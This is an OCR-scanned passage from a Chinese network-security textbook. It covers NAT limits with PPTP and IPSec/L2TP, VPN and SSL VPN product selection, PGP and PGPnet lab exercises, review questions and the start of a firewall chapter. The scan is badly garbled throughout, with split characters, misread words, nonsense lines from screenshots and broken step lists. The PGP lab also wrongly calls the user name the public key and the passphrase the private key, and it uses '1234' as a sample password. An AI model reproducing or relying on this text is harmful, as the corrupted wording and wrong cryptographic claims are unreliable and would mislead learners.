为 防止 这 种 情况 的 发 生 ，PPTP 的 NAT 编辑 器 必须 监视 PPTP 隧道 的 创建 过 程 ， 并 且 
在 专用 人 P 地 址 与 Call ID 之 间 建 立 单独 的 映射 关系 ， 就 像 PPTP 客户 将 公共 IP 地 址 与 在 
Internet PPTP 服务 器 上 所 接收 到 的 单独 Call ID 进行 映射 一 样 。 

2) IPSecL2TP 流量 

IPSec L2TP 流量 不 可 被 NAT 所 翻译 ， 这 就 是 因为 UDP 端口 号 被 加 密 了 ， 并 且 它 的 值 
受 校 验 和 的 保护 。 由 于 以 下 原因 ， 即 使 是 带 有 编辑 器 的 NAT 也 不 能 对 IPSec L2TP 流量 进 
行 翻译 。 

(1) 不 能 区 分 多 个 IPSec L2TP 数据 流 。 

ESP 头 中 包含 有 一 个 名 为 SPI( 安 全 参数 索引 ) 的 域 。SPI 可 以 用 来 将 明文 形式 卫 头 中 的 
目标 人 P 地 址 与 IPSec 安全 协议 连接 起 来 ， 用 来 标识 IPSec SA(Security Association， 安全 
协会 )。 

对 于 来 自 NAT 的 输出 流量 ， 它 的 目标 瑟 地 址 并 不 改变 。 对 于 到 达 NAT 的 流量 ， 目 标 
IP 地 址 必须 被 映射 到 专用 他 地 址 。 正 如 在 NAT 专用 网 络 端 可 能 会 存在 多 个 PPTP 客户 的 
情况 一 样 , 多 个 IPSec L2TP 数据 流 输入 流量 的 目标 瑟 地 址 与 SPI 上 。 但 是 , 由 于 ESP Auth 
跟踪 器 中 包含 有 用 来 验证 ESP 头 以 及 它 的 有 效 载荷 的 校 验 和 信息 ， 因 此 SPI 在 没有 校 验 和 
验证 的 情况 下 就 不 能 发 生 改 变 。 

(2) 不 能 改变 TCP 校 验 和 UDP 校 验 和 。 

在 IPSec L2TP 报 文 中 ，UDP 头 和 TCP 头 中 包含 关于 源 地 址 人 P 与 目标 地 址 P 地 址 的 
明文 形式 耳 头 在 内 的 校 验 和 。 在 没有 经 过 对 TCP 头 与 UDP 头 进行 校 验 和 验证 的 情况 下 ， 
就 不 能 改变 明文 形式 了 P 头 中 的 地 址 。 而 且 ，TCP 校 验 和 与 UDP 校 验 和 不 能 被 更 新 ， 是 因 
为 它们 是 有 效 载荷 中 的 被 加 密 部 分 。 


6.3.5 ”VPN 产品 的 选择 


过 去 由 于 信息 传递 、 运 输 不 易 等 条 件 阻 碍 ， 一 些 成 功 的 企业 只 能 在 有 限 的 区 域 范围 内 
把 规模 扩大 ， 因 此 大 大 降低 了 企业 的 竞争 力 。 现 在 ， 为 了 满足 整体 经 济 规模 持续 扩张 的 需 
求 ， 随 着 网 络 技术 的 不 断 更 新 、 企 业 VPN 级 产品 的 成 熟 发 展 ， 使 企业 可 以 将 总 部 外 的 分 支 
外 点 、 办 事 处 等 点 ， 根 据 企业 市 场 扩展 需要 ， 布 局 到 各 个 省 份 、 整 个 中 国 、 甚 至 是 世界 
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各 地 。 

然而 ， 当 企业 规模 转变 成 总 部 、 分 支 外 点 、 移 动 客户 等 多 点 架构 的 同时 ， 新 的 问题 又 
出 现 了 。 如 何 增强 企业 各 点 间 更 快速 、 稳 定 、 安 全 的 信息 流通 ， 如 : ERP 数据 存 取 、VoIP 
数字 电话 沟通 、E-mail 及 时 传输 等 应 用 ， 这 就 是 VPN 最 大 的 优势 与 特色 。 

在 面 对 市 场 上 众多 的 VPN 产品 , 网 络 专业 知识 略 显 不 足 的 企业 常常 显得 很 茫然 , 不 知 
如 何 选 择 适合 自己 企业 的 VPN 产品 。 若 是 任 由 系统 集成 商 推广 不 恰当 的 产品 组 合 ， 那 么 ， 
不 但 花费 了 高 额 的 费用 ， 还 达 不 到 最 佳 效果 。 如 今 大 多 数 中 小 企业 主 们 ， 在 企业 信息 化 升 
级 的 需求 下 ， 都 希望 能 够 选 购 到 真正 适合 其 企业 的 VPN 产品 和 解决 方案 。VPN 导入 评估 
表 如 图 6-10 所 示 。 


图 6-10 VPN 导入 评估 表 


1. 你 的 企业 是 否 需要 VPN 


根据 各 行业 的 经 验 累 积 ， 对 于 企业 信息 而 言 ， 可 以 说 企业 级 VPN 产品 应 用 主要 表现 为 
实时 信息 传递 与 高 安全 性 两 方面 。 由 于 企业 级 VPN 是 在 互联 网 上 使 用 加 密 隧道 , 将 所 有 分 
支 外 点 与 总 部 中 心 端 之 间 ， 建 立 一 个 私有 且 安 全 的 多 点 互联 网 络 ， 具 有 安全 、 简 单 、 方 便 、 
省 成 本 的 特性 。 通 过 VPN 网 络 可 让 企业 各 分 支 外 点 、 移 动用 户 达 到 如 同 置身 在 中 心 端 内 网 
的 效果 ， 达 到 远程 访问 ERP、 存 取 公 司 内 部 数据 ， 快 速 、 实 时 又 方便 。 此 外 ，VPN 另外 一 
项 特色 是 具有 加 密 的 功能 ， 因 此 企业 的 所 有 信息 通过 VPN 网 络 即 可 达到 安全 保密 的 效果 。 
整体 而 言 ， 如 果 一 个 企业 需要 让 各 地 外 点 远程 达到 实时 同步 共享 中 心 端 资源 ， 增 加 企业 对 
外 竞争 力 ， 同 时 保证 机 密 数 据 安 全 保密 ， 那 么 该 企业 就 需要 建构 适合 的 VPN 网 络 。 

通过 VPN 导入 评估 表 ， 企 业 用 户 可 以 简单 判断 是 否 需 要 VPN， 或 是 进一步 了 解 适合 
采用 何 种 VPN 协议 。 


2. 找 出 企业 最 适合 的 VPN 协议 


目前 市 面 上 企业 级 VPN 产品 有 高 、 中 、 低 三 级 产品 ， 但 几乎 都 是 由 三 个 最 主要 的 协议 
所 组 成 ， 包 含 PSec、SSL、PPTP 等 协议 类 型 。 而 要 找 出 企业 最 适合 的 VPN 产品 之 前 ， 必 
须 对 这 三 种 主要 协议 的 应 用 特性 有 所 了 解 。 


由 | 上 | | 劳 6 茹 加 符 龙 大 与 座 胡 专用 风 


一 般 而 言 , IPSec 是 运用 在 网 关 对 网 关 的 设备 , 也 就 是 中 心 端 对 规模 较 大 的 外 点 所 采用 
的 设备 ， 同 时 也 是 目前 运用 最 普及 的 VPN 协议 。 但 在 设 定 上 ， 多 达 二 十 几 个 设 定 步 又 ， 对 
于 不 太 具 备 网 关 知 识 的 企业 用 户 而 言 ， 弊 端 是 略 显 繁复 ， 对 网 管 而 言 ， 也 是 一 大 门槛 。 针 
对 这 点 ， 市 场 上 已 推出 SmartLink VPN 的 IPSec 改良 技术 ， 有 效 地 简化 了 IPSec 繁复 设 定 ， 
只 需 3 个 参数 即 可 完成 联机 设 定 ， 因 此 已 不 是 太 大 的 问题 。 但 PSec 协议 设 定 一 旦 联机 后 ， 
所 有 信息 也 跟着 开放 了 ， 每 个 人 可 使 用 的 信息 均 相 同 ， 无 法 设 定 不 同人 可 有 不 同 的 存 取 权 
限 ， 这 对 于 企业 只 想 开 放 有 限 的 权限 给 合作 伙伴 的 考虑 而 言 ， 是 一 个 比较 大 的 瓶颈 。 

相对 IPSec 而 言 ，SSL 是 近年 来 在 VPN 设备 市 场 中 ， 异 军 突起 流行 的 通信 协议 。 它 除 
了 拥有 实时 分 享 与 信息 安全 两 大 基本 优势 之 外 ， 还 可 针对 不 同 的 用 户 属性 ， 设 定 不 同 的 使 
用 权限 。 比 如 只 允许 合作 伙伴 使 用 FTP 服务 、 允 许 出 差 在 外 的 业务 人 员 使 用 ERP 数据 存 取 、 
允许 分 支 外 点 拥有 使 用 全 部 服务 的 权限 等 。 只 需要 标准 浏览 器 登入 中 心 端 应 用 、 存 取 内 网 
资源 ， 解 放 外 部 员工 VPN 联机 的 地 点 限制 。 对 于 VPN 产品 而 言 ，SSL VPN 的 加 入 ， 等 于 
更 加 强化 了 企业 信息 安全 的 全 面 性 。 然而 ,目前 SSL VPN 的 价格 虽然 已 降 到 中 小 企业 可 以 
接受 的 范围 ， 但 对 于 某 些 企业 来 说 ， 还 是 必须 考虑 相对 IPSec 较 高 的 建设 成 本 ， 因 此 若 企 
业 不 需要 管控 人 员 权 限 ，IPSec 倒是 不 错 的 选择 。 

至 于 PPTP 多 半 运 用 在 信息 流量 不 大 \ 不 需要 实时 信息 的 小 分 点 机 构 或 移动 用 户 。 PPTP 
虽然 使 用 较为 简单 ,但 在 安全 性 上 并 没有 完整 的 加 密 机 制 ， 所 以 对 于 企业 机 密 安 全 考虑 上 ， 
会 有 比较 高 的 风险 存在 。 因 此 ， 在 企业 各 点 ， 包 括 小 分 点 或 是 移动 用 户 ， 我 们 还 是 建议 采 
用 SSL VPN 或 是 IPSec VPN 协议 , 在 信息 安全 性 上 会 比较 适合 。 但 IPSec VPN 在 外 点 的 运 
用 上 ,必须 另外 建 置 一 台 VPN 设备 ， 对 于 只 有 单机 或 移动 用 户 而 言 ， 有 种 杀 鸡 址 用 牛刀 之 
感 ,为 了 解决 这 个 问题 ,Qno 侠 诺 公司 特别 针对 企业 单机 外 点 与 移动 用 户 推出 QnoKey IPSec 
客户 端 密 钥 ， 使 用 一 把 U 盘 大 小 的 Key 即 可 取代 路 由 器 设备 ， 实 现 简便 、 安 全 联机 总 部 ， 
并 可 省 去 网 管 人 员 维 护 设备 的 负担 ,大 大 降低 了 VPN 联网 建 置 的 总 体 成 本 。 因 此 如 何 找 出 
最 适合 企业 的 VPN 协议 ， 必 须根 据 企业 自身 不 同 的 需求 属性 ， 进 行 有 效 的 选择 。 


6.3.6 SSL VPN 产品 的 选择 


SSL(Secure Sockets Layer) 是 由 Netscape 公司 开发 的 一 套 Internet 数据 安全 协议 ， 当 前 
版 本 为 3.0。 它 已 被 广泛 地 用 于 Web 浏览 器 与 服务 器 之 问 的 身份 认证 和 加 密 数据 传输 。SSL 
协议 位 于 TCP/IP 协议 与 各 种 应 用 层 协议 之 问 ， 为 数据 通信 提供 安全 支持 。 

SSL 协议 可 分 为 两 层 : SSL 记录 协议 (SSL Record ProtocoD): 它 建立 在 可 靠 的 传输 协议 
(如 TCP) 之 上 ， 为 高 层 协议 提供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 。SSL 握手 协 
议 (SSL Handshake Protocol): 它 建立 在 SSL 记录 协议 之 上 , 用 于 在 实际 的 数据 传输 开始 前 ， 
通信 双方 进行 身份 认证 、 协 商 加 密 算 法 、 交 换 加 密 密 钥 等 。 

SSL VPN 产品 所 能 提供 的 终端 网 络 功能 已 经 与 传统 的 IPSec VPN 产品 几乎 一 样 强 大 ， 
SSL VPN 接 入 方式 是 点 对 网 VPN 接 入 的 最 佳 选 择 的 观点 ， 也 越 来 越 深入 人 心 。 同 时 随 着 
用 户 对 产品 的 要 求 越 来 越 高 ， 软 件 形式 的 VPN 早 就 逐步 地 让 位 于 硬件 VPN 设备 。 

然而 ， 随 着 技术 与 市 场 的 不 断 成 熟 ， 越 来 越 多 的 用 户 发 现 市 场 上 涌现 出 了 众多 厂家 的 

品 ， 各 自 的 产品 质量 参差 不 齐 ， 使 一 般 的 用 户 难 以 做 出 正确 的 判断 。 

用 户 购买 SSL VPN 产品 的 需求 出 发 点 各 不 相同 , 但 归根 结 底 可 以 整合 为 一 点 : 为 外 网 
移动 办 公 的 用 户 提供 一 条 连接 到 内 网 资源 快速 、 安 全 、 稳 定 的 通道 ， 这 个 通道 能 否 满足 快 
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速 、 安 全 、 稳 定 这 三 个 基本 要 求 ， 完 全 取决 于 用 户 所 选择 的 SSL VPN 产品 。 

1. 快速 性 

VPN 的 意义 不 仅仅 是 建立 连接 就 行 了 ， 如 果 VPN 接 入 的 速度 跟 不 上 应 用 要 求 ， 造 成 
应 用 系统 频繁 超时 甚至 操作 失败 ， 又 或 者 一 个 小 文件 的 传输 就 耗费 掉 了 用 户 大 量 的 时 间 ， 
则 建立 起 的 VPN 连接 就 没有 意义 了 。 所 以 用 户 对 速度 性 的 要 求 是 首当其冲 的 。SSL VPN 
的 接 入 速度 很 大 程度 依赖 于 两 方面 的 环境 : @ 设 备 部 署 地 的 网 络 接 入 状况 ，@ 移 动用 户 接 
入 处 的 网 络 状 况 。 设 备 部 署 地 的 网 络 接 入 状况 是 用 户 可 控制 的 ， 现 在 改善 用 户 网 络 接 入 环 
境 的 方式 主要 为 使 用 多 家 运营 商 的 线路 , 这 就 决定 了 SSL VPN 产品 必须 要 支持 多 条 网 络 线 
路 复 用 的 功能 ， 最 好 支持 接 入 用 户 的 智能 选 路 ， 从 而 使 接 入 用 户 选择 最 快 线路 接 入 ， 少 走 
冤枉 路 。 但 移动 用 户 接 入 的 网 络 状况 则 是 不 可 控 的 ， 即使 设备 部 署 地 的 网 络 出 口 状 况 再 好 ， 
那 也 不 可 能 达到 预期 的 接 入 速度 体验 。 事实 上 ， 如 何 来 克服 移动 接 入 处 网 络 状 况 差 的 问题 ， 
从 一 开始 就 是 业内 最 大 的 难题 。 所 以 选用 的 SSL VPN 产品 ， 必 须 能 通过 自身 的 技术 优势 对 
各 种 各 样 的 用 户 接 入 环境 进行 优化 ， 如 利用 全 流量 数据 的 压缩 技术 ， 以 达到 同等 网 络 带 宽 
下 传输 更 多 数据 ， 针 对 跨 运营 商 丢 包 比 较 严 重 的 网 络 进行 协议 优化 的 技术 等 ， 通 过 这 些 手 
段 最 终 实现 在 同等 网 络 情况 下 获得 更 快 的 VPN 访问 速度 。 在 这 方面 ,建议 客户 在 测试 的 时 
候 可 以 针对 跨 运 营 商 的 网 络 情况 进行 测试 ， 例 如 电信 线路 到 网 通 线路 ， 这 样 保障 了 对 用 户 
接 入 环境 的 最 大 兼容 性 。 


2. 安全 性 


用 户 接 入 内 网 的 目的 是 访问 内 网 资源 ， 内 网 资源 中 不 乏 各 单位 内 部 机 密 ， 如 果 这 些 内 
部 机 密 被 第 三 方 截取 并 破解 ， 其 后 果 不 堪 设想 。 因 此 一 款 好 的 SSL VPN 产品 应 该 是 真正 基 
于 工业 标准 SSL 协议 的 ， 至 少 拥有 DES、3DES、AES、MD5、RC4、RSA 等 基本 算法 ， 
并 且 随 着 国家 信息 安全 建设 步伐 的 加 快 ， 政 府 、 教 育 、 电 力 等 大 型 行业 用 户 选择 支持 国 密 
办 加 密 算法 SSL VPN 产品 无 疑 是 最 保险 的 选择 ,这样 避免 了 国家 强制 政策 出 台 后 ,全 线 产 
品 的 无 条 件 更 换 所 造成 的 大 量 IT 投入 浪费 的 风险 。 

但 这 仅仅 保证 的 是 数据 通道 传输 的 安全 , 一 款 好 的 SSL VPN 产品 还 应 该 关注 用 户 端 接 
入 安全 、 接 入 后 权限 控制 这 两 方面 问题 ， 因 为 普通 的 内 网 安全 防护 设备 并 不 能 对 SSL VPN 
方式 接 进 内 网 的 人 员 提 供 病 毒 安全 防护 ， 所 以 通过 客户 端 安全 检查 、VPN 专线 等 方式 ， 确 
保 建 立 起 的 SSL VPN 通道 不 变 成 病毒 、 木 马 专用 通道 是 SSL VPN 产品 必须 保证 的 。 同 时 ， 
对 接 入 人 员 的 身份 认证 也 是 安全 性 的 一 个 考察 点 ， 在 提供 了 基本 的 认证 方式 如 用 户 名 /密码 
认证 、 短 信 认 证 、USBKEY 认证 、 动 态 令 牌 认证 、 硬 件 特征 码 认证 等 方式 后 ， 与 客户 网 络 
内 部 已 有 的 第 三 方 服务 器 认证 、 域 认证 或 者 CA 认证 能 无 颖 结合 进行 身份 认证 ， 也 逐渐 成 
为 SSL VPN 认证 体系 评价 的 标准 之 一 。 而 对 于 接 入 人 员 细致 的 权限 控制 也 是 SSL VPN 产 
品 必 备 的 特性 之 一 ， 如 果 一 个 普通 权限 员工 接 入 内 网 后 可 以 随意 访问 财务 服务 器 ， 这 肯定 
是 存在 安全 隐患 的 ， 一 般 现 有 的 权限 控制 都 基于 角色 和 资源 的 关联 ， 并 搭配 以 用 户 门户 之 
类 的 技术 来 实现 。 
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3. 稳定 性 


随 着 信息 化 程度 的 提高 ， 越 来 越 多 的 单位 具体 业务 与 SSL VPN 进行 了 结合 ，SSL VPN 
线路 的 稳定 性 是 这 类 用 户 最 关注 的 问题 。 由 于 线路 故障 、 设 备 故障 等 原因 引起 的 SSL VPN 
线路 长 时 间 中 断 的 情况 都 是 不 允许 出 现 的 。 因 此 , 一 款 SSL VPN 产品 在 稳定 性 方面 的 技术 
保障 必 不 可 少 。 

4. 其 他 方面 

(1) 性 能 方面 。 

不 盲目 追求 高 性 能 ， 选 择 合适 应 用 规模 的 SSL VPN 设备 。 

(2) 人 性价比 。 

只 买 最 好 ， 不 买 最 贵 ， 同 等 价格 获得 越 多 的 功能 和 性 能 ， 是 所 有 采购 行为 追求 的 目标 。 
并 且 性 价 比 很 多 时 候 还 体现 在 后 续 的 平滑 升级 方面 ， 基 于 已 有 的 高 端 设备 搭配 一 个 较 低 端 
的 设备 集群 混合 使 用 ， 则 是 一 种 比较 容易 让 用 户 接受 的 升级 方式 。 

(3) 技术 支持 及 售后 服务 。 

如 果 没 有 良好 的 技术 支持 及 售后 服务 来 做 支撑 ， 其 产品 的 使 用 效果 会 大 打折 扣 。 

(4) 产品 市 场地 位 的 考察 。 

在 判断 产品 市 场地 位 方面 ， 业 内 的 口碑 以 及 第 三 方 市 场 调查 机 构 的 客观 调查 报告 则 是 
最 值得 参考 的 两 点 。 

(5) 总 结 。 

如 何 选 购 最 适合 企业 的 VPN 产品 , 除了 应 该 了 解 本 身 企业 架 构 的 商业 特性 之 外 ,还 必 
须 针 对 整体 网 络 环境 有 所 了 解 ， 才 不 致 错 买 了 不 适用 的 VPN 产品 ， 既 没 达 到 VPN 的 功效 ， 
又 白白 浪费 了 金钱 。 


小 结 


本 章 主要 介绍 了 加 密 技 术 和 几 种 常用 加 密 算法 的 基础 知识 。 对 电子 商务 中 用 到 的 数字 
签名 和 公 钥 技术 设施 也 做 了 介绍 。 最 后 详细 介绍 了 VPN 相关 技术 知识 , 包括 VPN 的 优势 、 
产品 的 选择 等 。 


本 章 实 训 
实 训 一 ”PGP 加 密 程序 应 用 


PGP(Pretty Good Privacy) 加 密 软 件 是 美国 Network Associate Inc. 出 产 的 免费 软件 ,可 用 
它 对 文件 、 邮 件 进行 加 密 ， 在 常用 的 WinZIP、word、ARJ、Excel 等 软件 的 加 密 功能 均 可 
被 破解 时 ， 选 择 PGP 对 自己 的 私人 文件 、 邮 件 进行 加 密 不 失 为 一 个 好 办 法 。 除 此 之 外 ， 你 
还 可 以 和 同样 装 有 PGP 软件 的 朋友 互相 传递 加 密 文件 ， 安 全 十 分 有 保障 。 


1. 实验 目的 


本 实验 采用 PGP 8.0.2 版 本 为 例 ， 介 绍 PGP 软件 的 使 用 ， 包 括 PGP 软件 的 安装 与 初始 
设置 ， 使 用 PGP 软件 加 密 和 解密 文件 。 


© 
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2. 实验 内 容 

1) 安装 

PGP 的 安装 很 简单 ， 和 平时 的 软件 安装 一 样 ， 只 需 按 提示 一 步 步 完 成 即 可 。 

2) ”生成 密 钥 

使 用 PGP 之 前 ,首先 需要 生成 一 对 密 钥 ， 这 一 对 密 钥 是 同时 生成 的 ， 其 中 的 一 个 称 为 
Si 意思 是 公共 的 密 钥 ， 你 可 以 把 它 分 发 给 你 的 朋友 们 ， 让 他 们 用 这 个 密 钥 来 加 密 文件 ; 

一 个 我 们 称 为 私 钥 ， 这 个 密 钥 由 你 保存 ， 你 是 用 这 个 密 钥 来 解 开 加 密 文件 的 。 打 开 “ 开 
中 “PGP” 的 “PGP KEYS”, 可 看 到 如 图 6-11 所 示 的 画面 。 单 击 图 标 或 者 用 菜单 Keys 
一 New keys 开始 生成 密 钥 。 PGP 有 一 个 很 好 的 密 钥 生成 向 导 ， 只 要 跟着 它 一 步 一 步 做 下 去 
就 可 以 生成 密 钥 生成 新 密 钥 的 过 程 。 

(1) 单 击 “ 开 始 ” 一 “程序 ”一 PGP 一 PGPKeys， 出 现 如 图 6-11 所 示 PGP 软件 界面 。 


WR pcPreys 
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图 6-11 PGP 软件 界面 图 


(2) 单 击 Keys 一 New keys。 出 现 如 图 6-12 所 示 的 提示 对 话 框 。 
图 6-12 中 提示 这 个 向 导 的 目的 是 生成 一 对 密 钥 , 你 可 以 用 它 来 加 密 文件 或 对 数字 文件 
进行 签名 。 单 击 “ 下 一 步 ”按钮 。 


Welcome to the PGP Key 
Generation Wizard 
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6-12 ”提示 向 导 图 
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(3) PGP 会 要 求 你 输入 全 名 和 邮件 地 址 。 虽 然 真实 的 姓名 不 是 必需 的 ， 但 是 输入 一 个 
你 的 朋友 看 得 懂 的 名 字 会 使 他 们 在 加 密 时 很 快 找到 想 要 的 密 钥 。 本 例 中 我 们 输入 
xinxigongchengxi 和 liuyanx009@126.com。 字 符 串 xinxigongchengxi 就 是 公 钥 。 输入 完成 后 
单 击 “ 下 一 步 ”按钮 。 出 现 如 图 6-13 所 示 界 面 。 

(4) 在 该 对 话 框 中 需要 两 次 输入 密码 。 该 密码 就 是 我 们 自己 的 私人 密 钥 ， 密 码 最 好 大 
于 8 位， 并 且 最 好 包括 大 小 写 、 空 格 、 数 字 、 标 点 符号 等 ， 最 妙 的 是 PGP 支持 用 中 文 作为 
密码 。 边 上 的 “Hide Typing ”指示 是 否 显示 键入 的 密码 。 本 例 中 我 们 使 用 私人 密 钥 
1235711131719232931， 是 从 1 到 31 的 质数 排列 。 接 下 来 PGP 会 花 一 点 时 间 来 生成 我 们 的 
密 钥 ， 如 图 6-14 一 图 6-16 所 示 。 


Name and Email Assignment 
Every key pai must have a name associated wh 让 Toe ea eee 
Se 


Edname rimiemechnpi 


nr 
in selecting the conect public key When communicating mih 


Emal addess [liuyurx0098128. co 


加 三 六 


图 6-13 ”在 提示 向 导 图 中 输入 邮箱 和 公 钥 


"assphrase Assignment 
人 
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You passphiase should be al least 8 chatacters long and should contain 
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回 Hide Typng 


6-14 ”生成 密 钥 过 程 
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PEP Key Generation Wizard 


Key Generation Progress 
Key generalion can nvolve mliple steps Some of these steps may equie several 
minules to complete 


Key generalion steps; 
v Generaingkey 
Generaing Subkey 
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Completing the PGP Key 
Generation Wizard 

You have successiuly generated a PGP key pa 
You wl now be able loreceve secure messages and 
sign documents. 


fyou wish to send your new public key lo akeyserver. 
SEE 二 dr 
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图 6-16 生成 密 钥 过 程 全 部 完成 
最 后 出 现 图 6-17 所 示 对 话 框 。 
回 是 归 
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把 公用 密 钥 发 给 我 们 的 朋友 。 用 快捷 键 CtrlHE 或 者 菜单 keys 一 Emport 将 我 们 的 密 钥 
导出 为 扩展 名 为 asc 或 txt 的 文件 ,将 它 发 给 我 们 的 朋友 们 (对 方 则 用 CtrlHM 或 keys 一 import 
导入 )。 

3) 加密 解密 操作 

(1) 对 文件 加 密 : 本 例 中 我 们 单 击 某 个 文件 夹 中 一 个 PPT 文件 进行 加 密 。 选 中 该 文件 ， 
单 击 右键 选择 PGP 的 Encrypt， 会 弹出 一 个 对 话 框 让 我 们 选择 要 用 的 密 钥 ， 双 击 使 它 加 到 
下 面 的 Recipients 框 中 即 可 ， 如 图 6-18 所 示 。 

单 击 OK 按钮 ， 加 密 文件 生成 。 比 较 加 密 前 后 的 图 标 ， 如 图 6-19(a) 为 加 密 前 文件 的 
图 标 、 图 6-19(b) 为 加 密 后 文件 的 图 标 所 示 。 

在 图 6-20 下 方 的 文本 框 中 输入 我 们 的 私人 密 钥 : 1235711131719232931。 单 击 OK 按 
钮 ， 会 出 现 Enter output filename 对 话 框 ， 提 示 我 们 选择 解密 后 的 文件 要 存放 的 位 置 。 解 密 
文件 完成 。 
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图 6-18 ”选择 加 密使 用 的 密 钥 
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图 6-19 ”比较 加 密 前 后 文件 的 图 标 
(2) 解密 : 选择 要 解密 的 文件 ， 右 击 ， 选择“ 打开 ”命令 ， 出 现 如 图 6-20 所 示 对 话 框 。 
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图 6-20 输入 解密 文件 使 用 的 密 钥 
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实 训 三 


使 用 PGP 实现 VPN 的 实施 


1. 实验 目的 


PGP 是 一 种 供 大 众 使 用 的 加 密 软 件 。 电 子 邮件 通过 开放 的 网 络 传输 ， 网 络 上 的 其 他 人 
都 可 以 监听 或 者 截取 邮件 , 来 获得 邮件 的 内 容 , 因而 邮件 的 安全 问题 就 比较 突出 了 。PGP 能 
够 提供 独立 计算 机 上 的 信息 保护 功能 ， 获 得 一 个 比较 完备 的 保密 系统 。 它 使 用 加 密 以 及 校 
验 的 方式 ， 提 供 了 多 种 功能 和 工具 ， 帮 助 您 保证 您 的 电子 邮件 、 文 件 、 磁 盘 以 及 网 络 通信 


的 安全 。 


本 节 使 用 PGP 软件 实现 VPN 的 实施 。 


2. 实验 准备 
在 实验 用 的 两 台 计 算 机 上 安装 有 PGP 软件 。 
3. 实验 过 程 


(D 
CO) 
G) 
(4) 
(5) 
(0 
(7) 
(8) 
(9) 


记录 下 合作 伙伴 的 计算 机 名 和 下 地 址 。 

单 击 “ 开 始 ” 一 “程序 ”一 PGP 一 PGPnet。 

仔细 阅读 Add Host Wizard 的 提示 内 容 ， 单 击 Next 按钮 。 

接受 默认 设置 ， 单 击 Next 按钮 。 

选择 默认 项 Enforce secure communications， 然 后 单 击 Next 按钮 。 

输入 启示 下 的 计算 机 名 后 单 击 Next 按钮 。 

输入 合作 伙伴 的 计算 机 名 或 地 址 ， 单 击 Next 按钮 。 

选中 Use public-key cryptographic security only 单 选 按钮 ， 然 后 单 击 Next 按钮 。 
接 下 来 选择 Automatically 选项 ， 然 后 单 击 Next 按钮 。 


(10) 单 击 Select Key 按钮 以 选择 自己 的 密 钥 。 

(11) 选中 显示 自己 的 公 钥 ， 单 击 OK 按钮 。 

(12) 单 击 Next 以 完成 该 过 程 。 

(13) 然后 将 被 要 求 输入 自己 的 私 钥 的 Passphrase， 创 建 一 个 系统 的 认证 条 目 。 


操作 。 
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(14) 双方 同时 打开 User Manager， 创 建新 用 户 ciw, 清除 User Must Change Password at 
Next Logon 选项 ， 以 1234 为 密码 。 

(15) 打开 PGPnet， 单 击 Add 按钮 。 

(16) 根据 向 导 提示 ， 在 列表 中 输入 合作 伙伴 的 下 地址 。 

(17) PGPnet 配置 窗口 中 ， 选 择 Hosts 页 ， 查 看 是 否 存 在 刚 建立 的 条 目 。 

(18) 建立 到 合作 伙伴 的 FTP 连接， 使 用 ciw 用 户 名 : 同时 ， 提 示 合 作 伙 伴 进行 相同 的 


(19) 观察 SA 指示 灯 将 变 为 绿色 。 
(20) 用 相反 的 规则 重复 上 述 各 步 。 
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本 章 习 题 

一 、 选 择 题 
1. 密码 学 中 ， 发 送 方 要 发 送 的 消息 称 为 (  )。 

A. 原文 Bl 客 关 C. 明文 D. 数据 
2.， 非法 接收 者 试图 从 密 文 分 析出 明文 的 过 程 称 为 ( ).。 

A. 破译 B. 解密 C. 读 取 D. 翻译 
3. ”下列 ( ””) 加 密 技 术 不 是 对 称 加 密 技 术 。 

A. IDEA B.RC5 C.DES D.RSA 
4. ”下列 选项 中 ，( ”) 不 是 电子 商务 采用 的 主要 安全 技术 。 

A. 加 密 技术 B. 数字 签名 全 AS 二 D. DNS 
二 、 填 空 题 
1. 加 密 技术 可 分 为 和 两 种 。 
2. 非 对 称 加 密 技术 也 叫 作 技术 。 
3. 对称 密 钥 算法 中 ， 和 的 双方 使 用 的 是 相同 的 密 钥 。 
4. PKI 是 的 缩写 。 
5. VPN 是 指 
三 、 简 答题 


1. 简 述 加 密 技术 在 实际 生活 中 的 应 用 。 

2. 简 述 对 称 加 密 算法 和 非 对 称 加 密 技 术 的 相同 点 和 不 同 点 。 
3.” 简 述 PKI 的 基本 特点 。 

4. 什么 是 公 钥 密码 算法 ? 公 钥 是 将 密 钥 完 全 公开 吗 ? 

5.、 简 述 在 RSA 算法 中 加 密 密 钥 和 解密 密 钥 产 生 的 过 程 。 

6.、 我 国有 没有 必要 开展 密码 学 的 研究 ? 

7. 选择 SSL VPN 产品 需要 从 哪 几 个 方面 综合 考虑 ? 


第 7 章 防 火 墙 


【本 章 要 点 】 
通过 本 章 的 学 习 ， 可 以 了 解 防火 墙 的 基本 概念 和 防火 墙 的 功能 ， 掌 握 防火 墙 的 规则 ; 
掌握 防火 墙 的 分 类 方法 和 体系 结构 的 相关 知识 ; 掌握 防火 墙 的 应 用 方法 。 


7.1 防火墙 概述 


7.1.1 防火墙 的 基本 概念 


所 谓 “防火 墙 ”， 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Intemeb 分 开 的 方法 ， 它 实际 上 
是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 ， 它 能 允许 你 “ 同 
意 ” 的 人 和 数据 进入 你 的 网 络 ， 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 ， 最 大 限度 地 阻 
止 网 络 中 的 黑客 来 访问 你 的 网 络 。 换 名 话说， 如 果 不 通 过 防火 墙 ， 公 司 内 部 的 人 就 无 法 访 
问 Internet，Intermmet 上 的 人 也 无 法 和 公司 内 部 的 人 进行 通信 。 

防火 墙 指 的 是 一 个 由 软件 和 硬件 设备 组 合 而 成 、 在 内 部 网 和 外 部 网 之 间 、 专 用 网 与 公 
共 网 之 间 的 界面 上 构造 的 保护 屏障 。 它 是 一 种 获取 安全 性 方法 的 形象 说 法 ， 是 一 种 计算 机 
硬件 和 软件 的 结合 ， 使 Internet 与 Intranet 之 间 建 立 起 一 个 安全 网 关 (Security Gateway)， 从 
而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 主要 由 服务 访问 规则 、 验 证 工具 、 包 过 滤 和 应 
用 网 关 四 个 部 分 组 成 。 

下 面 介绍 有 关 防 火 墙 的 一 些 基本 术语 ， 理 解 和 记 住 这 些 术 语 对 下 面 的 学 习 是 很 有 帮 
助 的 。 

1) ”防火 墙 (firewalD) 

在 被 保护 网 络 和 因特网 之 间 ， 或 在 其 他 网 络 之 间 限 制 访问 的 一 种 或 一 系列 部 件 。 

2) “主机 (host) 

